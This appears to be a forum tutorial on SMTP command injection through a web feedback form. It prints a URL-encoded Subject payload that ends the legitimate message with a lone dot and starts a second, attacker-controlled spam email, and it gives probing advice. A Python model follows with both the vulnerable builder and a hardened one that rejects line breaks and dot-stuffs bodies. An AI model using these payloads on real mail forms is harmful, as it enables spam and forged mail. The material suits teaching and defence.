I haven't done anything in a while, and I didn't find this here, so I figured I'd write an article on it. Here you go.
There are cases where an application performs the SMTP conversation itself, or passes user-supplied input to a different component that does so. In this situation, it may be possible to inject arbitrary SMTP commands directly into that conversation, potentially taking full control of the messages the application generates.
For example, consider an application that uses requests of the following form to submit site feedback:
POST /feedback.php HTTP/1.1
Host: site.com
Content-Length: 56

From=email@example.com&Subject=Site+feedback&message=foo
This causes the web application to perform an SMTP conversation with the mail server, issuing the usual MAIL FROM, RCPT TO and DATA commands and placing the From, Subject and message parameters into the message it sends.
NOTE: After the SMTP client issues the DATA command, it sends the contents of the email message, comprising the message headers and body, and then sends a single dot character on its own line. This tells the server that the message is complete, and the client can then issue further SMTP commands to send further messages.
In this situation, you may be able to inject arbitrary SMTP commands into any of the email fields that you control. For example, you can attempt to inject into the Subject field as follows:
POST /feedback.php HTTP/1.1
Host: site.com
Content-Length: 240

From=email@example.com&Subject=Site+feedback%0d%0ahello%0d%0a%2e%0d%0aMAIL+FROM:+firstname.lastname@example.org%0d%0aRCPT+TO:+email@example.com%0d%0aDATA%0d%0aFrom:+firstname.lastname@example.org%0d%0aTo:+email@example.com%0d%0aSubject:+Cheap+viagra%0d%0aBlah%0d%0a%2e%0d%0a&message=foo

Here %0d%0a is a URL-encoded CRLF and %2e is a URL-encoded dot, so the Subject value first terminates the legitimate message with a lone dot and then starts a second SMTP transaction. If the application is vulnerable, this results in the following SMTP conversation, which produces two different email messages, the second of which is entirely within your control:
MAIL FROM: firstname.lastname@example.org
RCPT TO: email@example.com
DATA
From: firstname.lastname@example.org
To: email@example.com
Subject: Site feedback
hello
.
MAIL FROM: firstname.lastname@example.org
RCPT TO: email@example.com
DATA
From: firstname.lastname@example.org
To: email@example.com
Subject: Cheap viagra
Blah
.

foo
.

The trailing "foo" and "." are the remainder of the original request body; the server receives them in command mode and rejects them as invalid commands, but the two messages have already been accepted.
Finding SMTP injection flaws:
To probe an application's mail functionality effectively, you need to target every parameter that is submitted to an email-related function, even those that may initially appear to be unrelated to the content of the generated message (hidden fields, reply-to addresses, names, and so on).
You should also test for each kind of attack (injecting extra headers, a premature dot terminator, and whole SMTP commands), and you should perform each test case using both Windows-style (CRLF, %0d%0a) and Unix-style (LF, %0a) newline characters, since mail servers differ in which line endings they accept.
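The following Python script is an added example, not code from the original article. It models the feedback form above: a naive builder that concatenates the From and Subject parameters straight into the SMTP stream, a small parser that behaves like a lenient mail server (accepting CRLF or bare LF, as the testing advice above suggests trying both) and counts the messages it would actually deliver, the article's Subject payload built with either newline style, and a hardened builder that rejects line breaks in header values and dot-stuffs the body per RFC 5321 section 4.5.2. All addresses and message text are constructed sample data; SITE_MAILBOX is an assumed recipient for the form.

```python
"""Toy model of SMTP header injection and its fix (added example, not the article's code).
All addresses and message text are constructed sample data."""
import re
from urllib.parse import quote_plus

SITE_MAILBOX = "feedback@site.com"   # assumed recipient of the feedback form
ATTACKER = "attacker@example.org"    # constructed
VICTIM = "victim@example.com"        # constructed


def build_conversation_naive(from_addr, subject, body, to_addr=SITE_MAILBOX):
    """Vulnerable: user-controlled header values are concatenated straight into
    the SMTP stream, so a CR/LF inside them becomes a new protocol line."""
    lines = [
        f"MAIL FROM: {from_addr}",
        f"RCPT TO: {to_addr}",
        "DATA",
        f"From: {from_addr}",
        f"To: {to_addr}",
        f"Subject: {subject}",
        "",
        body,
        ".",
    ]
    return "\r\n".join(lines) + "\r\n"


def is_header_safe(value):
    """A header value may never contain a line break; that is the whole fix."""
    return "\r" not in value and "\n" not in value


def build_conversation_safe(from_addr, subject, body, to_addr=SITE_MAILBOX):
    """Hardened: reject CR/LF in header fields and dot-stuff the body
    (RFC 5321 4.5.2) so a lone '.' line in user text cannot end the message early."""
    for name, value in (("From", from_addr), ("Subject", subject)):
        if not is_header_safe(value):
            raise ValueError(f"{name} header contains a line break")
    body_lines = re.split(r"\r?\n", body)
    stuffed = "\r\n".join("." + l if l.startswith(".") else l for l in body_lines)
    return build_conversation_naive(from_addr, subject, stuffed, to_addr)


def injected_subject(newline="\r\n"):
    """The article's Subject payload before URL-encoding; pass "\n" to try the
    Unix-style variant the article recommends testing as well."""
    return newline.join([
        "Site feedback",
        "hello",
        ".",                        # terminates the legitimate message
        f"MAIL FROM: {ATTACKER}",
        f"RCPT TO: {VICTIM}",
        "DATA",
        f"From: {ATTACKER}",
        f"To: {VICTIM}",
        "Subject: Cheap viagra",
        "Blah",
        ".",                        # terminates the attacker's message
    ])


def url_encode_payload(payload):
    """Form-encode a payload the way it would appear in the POST body."""
    return quote_plus(payload, safe="")


def parse_conversation(stream):
    """Model of a lenient MTA (accepts CRLF or bare LF): returns the messages a
    client stream would actually deliver, with envelope, subject and body."""
    messages, state, in_headers = [], "command", True
    mail_from, rcpts, current = None, [], None
    for line in re.split(r"\r?\n", stream):
        if state == "command":
            upper = line.upper()
            if upper.startswith("MAIL FROM:"):
                mail_from = line[10:].strip()
            elif upper.startswith("RCPT TO:"):
                rcpts.append(line[8:].strip())
            elif upper == "DATA":
                current = {"mail_from": mail_from, "rcpt": list(rcpts),
                           "subject": None, "body_lines": []}
                state, in_headers = "data", True
            # anything else (the stray "foo" in the article) is a syntax error the server rejects
        elif line == ".":
            messages.append(current)
            mail_from, rcpts, current, state = None, [], None, "command"
        elif in_headers:
            if line == "":
                in_headers = False
            elif line.lower().startswith("subject:"):
                current["subject"] = line[8:].strip()
        else:
            # undo dot-stuffing: a line sent as '..' was '.' in the original body
            current["body_lines"].append(line[1:] if line.startswith("..") else line)
    return messages


if __name__ == "__main__":
    for nl in ("\r\n", "\n"):
        delivered = parse_conversation(
            build_conversation_naive("email@example.com", injected_subject(nl), "foo"))
        print(repr(nl), "->", len(delivered), "messages; second subject:", delivered[1]["subject"])
```

Feeding the naive builder the injected Subject yields two delivered messages whichever newline style is used, while the hardened builder refuses the header outright; the dot-stuffing matters separately, since a legitimate body containing a lone "." line would otherwise be truncated even without an attacker.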
I hope you liked it, I'm working on more as we speak.